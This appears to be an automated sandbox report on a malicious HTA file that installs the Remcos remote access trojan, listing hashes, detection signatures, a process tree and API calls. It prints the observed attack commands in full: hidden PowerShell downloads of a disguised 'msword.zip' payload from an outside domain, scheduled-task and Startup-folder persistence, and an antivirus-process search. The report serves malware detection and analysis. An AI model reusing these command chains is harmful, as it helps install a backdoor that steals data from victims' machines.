Edit tour

Windows Analysis Report
c2.hta

Overview

General Information

Sample name:	c2.hta
Analysis ID:	1584279
MD5:	ece58ed90bef5251133c688f6afe915f
SHA1:	0b56d72ecb891950f8b4e8bf7288aee0ac102101
SHA256:	bbe818541c34a4def85455fa7a1392d2ded1e76ca6d89f08125a13d09ea4b93a
Tags:	htauser-abuse_ch
Infos:

Detection

Remcos

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Detected Remcos RAT

Sigma detected: Drops script at startup location

Sigma detected: Remcos

Sigma detected: Search for Antivirus process

AI detected suspicious sample

Drops PE files with a suspicious file extension

Drops large PE files

Found API chain indicative of sandbox detection

Installs a global keyboard hook

Loading BitLocker PowerShell Module

Powershell drops PE file

Sigma detected: Legitimate Application Dropped Script

Sigma detected: Suspicious Command Patterns In Scheduled Task Creation

Sigma detected: Suspicious Invoke-WebRequest Execution

Sigma detected: Suspicious MSHTA Child Process

Sigma detected: Suspicious Script Execution From Temp Folder

Sigma detected: WScript or CScript Dropper

Suspicious powershell command line found

Uses schtasks.exe or at.exe to add and modify task schedules

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Wscript called in batch mode (surpress errors)

Contains functionality for read data from the clipboard

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates files inside the system directory

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for the Microsoft Outlook file path

Sigma detected: PowerShell Web Download

Sigma detected: SCR File Write Event

Sigma detected: Suspicious Copy From or To System Directory

Sigma detected: Suspicious Schtasks From Env Var Folder

Sigma detected: Suspicious Screensaver Binary File Creation

Sigma detected: Usage Of Web Request Commands And Cmdlets

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Stores files to the Windows start menu directory

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

System is w10x64

mshta.exe (PID: 1236 cmdline: mshta.exe "C:\Users\user\Desktop\c2.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)

cmd.exe (PID: 5960 cmdline: "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 4464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 6184 cmdline: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

Acrobat.exe (PID: 7296 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\W2.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)

AcroCEF.exe (PID: 7628 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)

AcroCEF.exe (PID: 7784 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2100 --field-trial-handle=1632,i,1275163291349414999,11919698709782413432,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)

powershell.exe (PID: 7360 cmdline: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

powershell.exe (PID: 8600 cmdline: powershell -WindowStyle Hidden -Command "Expand-Archive -Path C:\Users\user\AppData\Local\Temp\msword.zip -DestinationPath C:\Users\user\AppData\Local\Temp\msword -Force" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

msword.exe (PID: 8860 cmdline: msword.exe MD5: 6BCF42715FD1768FE1013C702612D0EE)

cmd.exe (PID: 9000 cmdline: "C:\Windows\System32\cmd.exe" /c copy Market Market.cmd && Market.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 9008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 9052 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 9060 cmdline: findstr /I "wrsa opssvc" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

tasklist.exe (PID: 9108 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 9116 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 9152 cmdline: cmd /c md 677826 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

findstr.exe (PID: 9168 cmdline: findstr /V "MechanicalDlModularRuSchedulingVisibilityProposalsClimb" Hearings MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 9184 cmdline: cmd /c copy /b ..\Charged + ..\Syndicate + ..\Controversy + ..\Fig + ..\Phentermine + ..\Peripheral + ..\Lets + ..\Usgs + ..\Viewed + ..\Dealer + ..\Matter N MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Prostores.com (PID: 9200 cmdline: Prostores.com N MD5: 62D09F076E6E0240548C2F837536A46A)

cmd.exe (PID: 6976 cmdline: cmd /c schtasks.exe /create /tn "Troubleshooting" /tr "wscript //B 'C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.js'" /sc minute /mo 5 /F MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 8212 cmdline: schtasks.exe /create /tn "Troubleshooting" /tr "wscript //B 'C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.js'" /sc minute /mo 5 /F MD5: 48C2FE20575769DE916F48EF0676A965)

cmd.exe (PID: 8364 cmdline: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CineBlend.url" & echo URL="C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CineBlend.url" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

choice.exe (PID: 1020 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)

cmd.exe (PID: 8896 cmdline: "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\cleanup.bat" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 8904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

timeout.exe (PID: 8948 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

wscript.exe (PID: 8388 cmdline: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)

CineBlend.scr (PID: 8488 cmdline: "C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr" "C:\Users\user\AppData\Local\MediaFusion Technologies Inc\s" MD5: 62D09F076E6E0240548C2F837536A46A)

wscript.exe (PID: 5004 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)

CineBlend.scr (PID: 3524 cmdline: "C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr" "C:\Users\user\AppData\Local\MediaFusion Technologies Inc\s" MD5: 62D09F076E6E0240548C2F837536A46A)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Remcos, RemcosRAT	Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.	APT33 The Gorgon Group UAC-0050	http://malware-traffic-analysis.net/2017/12/22/index.html https://0xmrmagnezi.github.io/malware%20analysis/RemcosRAT/ https://asec.ahnlab.com/en/32376/ https://asec.ahnlab.com/ko/25837/ https://asec.ahnlab.com/ko/32101/	https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Sigma Signatures

System Summary

Sigma detected: Legitimate Application Dropped Script

Source: File created

Author: frack113, Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\mshta.exe, ProcessId: 1236, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\c2[1].bat

Sigma detected: Suspicious Command Patterns In Scheduled Task Creation

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "Troubleshooting" /tr "wscript //B 'C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.js'" /sc minute /mo 5 /F, CommandLine: schtasks.exe /create /tn "Troubleshooting" /tr "wscript //B 'C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.js'" /sc minute /mo 5 /F, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: cmd /c schtasks.exe /create /tn "Troubleshooting" /tr "wscript //B 'C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.js'" /sc minute /mo 5 /F, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6976, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks.exe /create /tn "Troubleshooting" /tr "wscript //B 'C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.js'" /sc minute /mo 5 /F, ProcessId: 8212, ProcessName: schtasks.exe

Sigma detected: Suspicious Invoke-WebRequest Execution

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip", CommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5960, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip", ProcessId: 7360, ProcessName: powershell.exe

Sigma detected: Suspicious MSHTA Child Process

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat", CommandLine: "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: mshta.exe "C:\Users\user\Desktop\c2.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 1236, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat", ProcessId: 5960, ProcessName: cmd.exe

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip", CommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5960, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip", ProcessId: 7360, ProcessName: powershell.exe

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.js", CommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.js", ProcessId: 8388, ProcessName: wscript.exe

Sigma detected: PowerShell Web Download

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf", CommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5960, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf", ProcessId: 6184, ProcessName: powershell.exe

Sigma detected: SCR File Write Event

Source: File created

Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\677826\Prostores.com, ProcessId: 9200, TargetFilename: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr

Sigma detected: Suspicious Copy From or To System Directory

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c copy Market Market.cmd && Market.cmd, CommandLine: "C:\Windows\System32\cmd.exe" /c copy Market Market.cmd && Market.cmd, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: msword.exe, ParentImage: C:\Users\user\AppData\Local\Temp\msword\msword.exe, ParentProcessId: 8860, ParentProcessName: msword.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy Market Market.cmd && Market.cmd, ProcessId: 9000, ProcessName: cmd.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Sigma detected: Suspicious Screensaver Binary File Creation

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\677826\Prostores.com, ProcessId: 9200, TargetFilename: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf", CommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5960, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf", ProcessId: 6184, ProcessName: powershell.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.js", CommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.js", ProcessId: 8388, ProcessName: wscript.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf", CommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5960, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf", ProcessId: 6184, ProcessName: powershell.exe

Data Obfuscation

Sigma detected: Drops script at startup location

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 8364, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CineBlend.url

HIPS / PFW / Operating System Protection Evasion

Sigma detected: Search for Antivirus process

Source: Process started

Author: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Market Market.cmd && Market.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 9000, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 9116, ProcessName: findstr.exe

Stealing of Sensitive Information

Sigma detected: Remcos

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\677826\Prostores.com, ProcessId: 9200, TargetFilename: C:\ProgramData\remcos\logs.dat

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://myguyapp.com/msword.zip	Avira URL Cloud: Label: malware
Source: https://myguyapp.com/c2.bat	Avira URL Cloud: Label: malware

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 98.8% probability

Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Code function: 15_2_00406301 FindFirstFileW,FindClose,	15_2_00406301
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Code function: 15_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	15_2_00406CC7
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 36_2_00BAA087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	36_2_00BAA087
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 36_2_00BAA1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	36_2_00BAA1E2
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 36_2_00B9E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	36_2_00B9E472
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 36_2_00BAA570 FindFirstFileW,Sleep,FindNextFileW,FindClose,	36_2_00BAA570
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 36_2_00BA66DC FindFirstFileW,FindNextFileW,FindClose,	36_2_00BA66DC
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 36_2_00B6C622 FindFirstFileExW,	36_2_00B6C622
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 36_2_00BA73D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	36_2_00BA73D4
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 36_2_00BA7333 FindFirstFileW,FindClose,	36_2_00BA7333
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 36_2_00B9D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	36_2_00B9D921
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 36_2_00B9DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	36_2_00B9DC54
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 38_2_0064A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	38_2_0064A087
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 38_2_0064A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	38_2_0064A1E2
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 38_2_0063E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	38_2_0063E472
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 38_2_0064A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,	38_2_0064A570
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 38_2_0060C622 FindFirstFileExW,	38_2_0060C622
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 38_2_006466DC FindFirstFileW,FindNextFileW,FindClose,	38_2_006466DC
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 38_2_00647333 FindFirstFileW,FindClose,	38_2_00647333
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 38_2_006473D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	38_2_006473D4
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 38_2_0063D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	38_2_0063D921
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 38_2_0063DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	38_2_0063DC54

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\msword	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\msword\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior

Source: Joe Sandbox View

IP Address: 178.237.33.50 178.237.33.50

Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr

Code function: 36_2_00BAD889 InternetReadFile,SetEvent,GetLastError,SetEvent,

36_2_00BAD889

Source: msword.exe.12.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
